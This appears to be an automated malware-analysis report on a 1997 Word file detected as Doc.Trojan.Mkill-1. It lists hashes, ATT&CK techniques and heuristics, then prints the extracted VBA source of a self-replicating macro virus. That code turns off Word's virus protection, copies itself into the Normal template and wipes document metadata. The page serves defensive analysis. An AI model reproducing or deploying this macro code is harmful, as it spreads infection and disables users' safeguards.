Office (OLE) malware analysis — malicious · 78d97d0470bab3c0

MALICIOUS

Office (OLE)

61.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 2adc74316c66225f5a12ebec2e78bf65 SHA-1: ccda5d83f73cf76c0e99111a32f96ccd7196594d SHA-256: 78d97d0470bab3c07a4beb77814870d745ed83fa17e0a439c807e1593e611fcb

220 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1547.001 Registry Run Keys / Startup Folder

This document contains VBA macros that are designed to disable security warnings and modify the Normal template. The script attempts to achieve persistence by writing to the Normal template, which will execute the macro every time a document is opened. The presence of AutoOpen and Document_Open macros, along with the disabling of virus protection, strongly suggests malicious intent.

Heuristics 6

ClamAV: Doc.Trojan.Mkill-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Mkill-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45417 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45417 bytes
SHA-256: `bfe91d65898b089b4abb08060d6c988606d45fc61ab957f90f71685395f2227e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim A1, A2, A3, A4 As Boolean Dim A5, A6 As Object Dim A7, A8, A16 As Integer Dim A10, A11, A12, A13, A14 As String Rem :-D you are marked!.it's just shit Const A15 = "I Love Amon" Private Sub Document_Open() On Error Resume Next jest Set A5 = ActiveDocument.VBProject.VBComponents.Item(1) Set A6 = NormalTemplate.VBProject.VBComponents.Item(1) A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100) A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100) With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With If A4 = False Then A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines End If If A3 = False Then A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines End If End Sub Private Sub Document_Close() On Error Resume Next jest Set A5 = ActiveDocument.VBProject.VBComponents.Item(1) Set A6 = NormalTemplate.VBProject.VBComponents.Item(1) A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100) A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100) With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With If (A3 = True Xor A4 = True) And _ (ActiveDocument.SaveFormat = wdFormatDocument Or _ ActiveDocument.SaveFormat = wdFormatTemplate) Then If A3 = True Then A2 = NormalTemplate.Saved A11 = A5.CodeModule.Lines(1, A5.CodeModule.CountOfLines) A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines A6.CodeModule.AddFromString A11 With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "": .Category = "": .Keywords = "": .Comments = "": .Execute: End With If A2 = True Then NormalTemplate.Save End If If A4 = True Or ActiveDocument.Saved = False Then A1 = ActiveDocument.Saved A11 = A6.CodeModule.Lines(1, A6.CodeModule.CountOfLines) A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines A5.CodeModule.AddFromString A11 With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "": .Category = "": .Keywords = "": .Comments = "": .Execute: End With If A1 = True Then ActiveDocument.Save End If End If End Sub Private Sub Document_new() On Error Resume Next jest Set A5 = ActiveDocument.VBProject.VBComponents.Item(1) Set A6 = NormalTemplate.VBProject.VBComponents.Item(1) A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100) A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100) With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With If A4 = False Then A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines End If If A3 = False Then A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines End If End Sub Private Function jest() Dim DelFlag As Boolean Dim DocAmon, TempAmon, DocAmonL, TempAmonL As Boolean Dim i, x As Integer Dim MacroNames As String On Error GoTo Getout Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone WordBasic.DisableAutoMacros 0 Options.VirusProtection = False Options.SaveNormalPrompt = False DocAmon = False TempAmon = False DocAmonL = False TempAmonL = False DelFlag = True Do While (DelFlag) For i = 1 To ActiveDocument.VBProject.VBComponents.Count MacroNames = ActiveDocument.VBProject.VBComponents(i).Name If MacroNames <> "AmonClean" And MacroNames <> "ThisDocument" Then Application.OrganizerDelete Source:=ActiveDocument.FullName, _ Name:=MacroNames, Object:=wdOrganizerObjectProjectItems DelFlag = True MsgBox "Find Micro [" & MacroNames & "] ,I shall kill it!" _ , vbCritical, "Micro Virus Killer Ver. 1.2" Exit For Else DelFlag = False End If Next Loop DelFlag = True Do While (DelFlag) For i = 1 To NormalTemplate.VBProject.VBComponents.Count MacroNames = NormalTemplate.VBProject.VBComponents(i).Name ... (truncated)

SHA-256: bfe91d65898b089b4abb08060d6c988606d45fc61ab957f90f71685395f2227e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim A1, A2, A3, A4 As Boolean
Dim A5, A6 As Object
Dim A7, A8, A16 As Integer
Dim A10, A11, A12, A13, A14 As String
Rem :-D you are marked!.it's just shit
Const A15 = "I Love Amon"
Private Sub Document_Open()
On Error Resume Next
jest
Set A5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set A6 = NormalTemplate.VBProject.VBComponents.Item(1)
A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100)
A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If A4 = False Then
    A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines
End If
If A3 = False Then
        A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines
End If
End Sub
Private Sub Document_Close()
On Error Resume Next
jest
Set A5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set A6 = NormalTemplate.VBProject.VBComponents.Item(1)
A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100)
A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If (A3 = True Xor A4 = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
      If A3 = True Then
        A2 = NormalTemplate.Saved
        A11 = A5.CodeModule.Lines(1, A5.CodeModule.CountOfLines)
        A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines
        A6.CodeModule.AddFromString A11
        With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "": .Category = "": .Keywords = "": .Comments = "": .Execute: End With
        If A2 = True Then NormalTemplate.Save
      End If
    If A4 = True Or ActiveDocument.Saved = False Then
     A1 = ActiveDocument.Saved
     A11 = A6.CodeModule.Lines(1, A6.CodeModule.CountOfLines)
     A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines
     A5.CodeModule.AddFromString A11
     With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "": .Category = "": .Keywords = "": .Comments = "": .Execute: End With
     If A1 = True Then ActiveDocument.Save
   End If
End If
End Sub
Private Sub Document_new()
On Error Resume Next
jest
Set A5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set A6 = NormalTemplate.VBProject.VBComponents.Item(1)
A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100)
A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If A4 = False Then
    A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines
End If
If A3 = False Then
        A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines
End If
End Sub
Private Function jest()
Dim DelFlag As Boolean
Dim DocAmon, TempAmon, DocAmonL, TempAmonL As Boolean
Dim i, x As Integer
Dim MacroNames As String
On Error GoTo Getout
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
DocAmon = False
TempAmon = False
DocAmonL = False
TempAmonL = False
DelFlag = True
Do While (DelFlag)
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
MacroNames = ActiveDocument.VBProject.VBComponents(i).Name
    If MacroNames <> "AmonClean" And MacroNames <> "ThisDocument" Then
     Application.OrganizerDelete Source:=ActiveDocument.FullName, _
     Name:=MacroNames, Object:=wdOrganizerObjectProjectItems
     DelFlag = True
     MsgBox "Find Micro [" & MacroNames & "] ,I shall kill it!" _
    , vbCritical, "Micro Virus Killer Ver. 1.2"
     Exit For
     Else
     DelFlag = False
    End If
Next
Loop
DelFlag = True
Do While (DelFlag)
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
MacroNames = NormalTemplate.VBProject.VBComponents(i).Name
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.